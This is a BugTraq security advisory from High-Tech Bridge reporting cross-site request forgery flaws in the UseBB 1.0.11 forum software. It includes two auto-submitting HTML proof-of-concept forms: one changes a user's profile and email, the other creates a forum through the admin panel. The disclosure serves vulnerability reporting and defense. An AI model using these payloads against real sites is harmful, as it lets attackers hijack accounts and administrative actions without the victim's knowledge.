BugTraq
HTB22913: Multiple CSRF (Cross-Site Request Forgery) in UseBB Apr 05 2011 09:33AM
advisory htbridge ch
Vulnerability ID: HTB22913
Reference: http://www.htbridge.ch/advisory/multiple_csrf_cross_site_request_forgery
_in_usebb.html
Product: UseBB
Vendor: UseBB ( http://www.usebb.net/ )
Vulnerable Version: 1.0.11
Vendor Notification: 22 March 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/panel.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of

sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:

[html]
<form action="http://[host]/panel.php?act=editprofile" method="post" name="main" id="main">
<input type="hidden" name="displayed_name" value="123">
<input type="hidden" name="real_name" value="">
<input type="hidden" name="avatar_remote" value="">
<input type="hidden" name="birthday_month" value="">
<input type="hidden" name="birthday_day" value="">
<input type="hidden" name="birthday_year" value="">
<input type="hidden" name="location" value="">
<input type="hidden" name="website" value="">
<input type="hidden" name="occupation" value="">
<input type="hidden" name="interests" value="">
<input type="hidden" name="signature" value="">
<input type="hidden" name="email" value="test (at) test (dot) com [email concealed]">
<input type="hidden" name="msnm" value="">
<input type="hidden" name="yahoom" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="jabber" value="">
<input type="hidden" name="skype" value="">
<input type="hidden" name="submit" value="OK">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
[/html]

The vulnerability exists due to failure in the "admin.php" script to properly verify the source of HTTP request.
Attacker can use browser to exploit this vulnerability. The following PoC is available:

[html]
<form action="http://[host]/admin.php?act=forums&do=add" method="post" name="main" id="main">
<input type="hidden" name="name" value="123">
<input type="hidden" name="cat_id" value="1">
<input type="hidden" name="descr" value="">
<input type="hidden" name="status" value="1">
<input type="hidden" name="moderators" value="">
<input type="hidden" name="increase_post_count" value="1">
<input type="hidden" name="auto_lock" value="">
<input type="hidden" name="auth0" value="0">
<input type="hidden" name="auth1" value="0">
<input type="hidden" name="auth2" value="0">
<input type="hidden" name="auth3" value="0">
<input type="hidden" name="auth4" value="0">
<input type="hidden" name="auth5" value="0">
<input type="hidden" name="auth6" value="0">
<input type="hidden" name="auth7" value="0">
<input type="hidden" name="auth8" value="0">
<input type="hidden" name="auth9" value="0">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
[/html]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus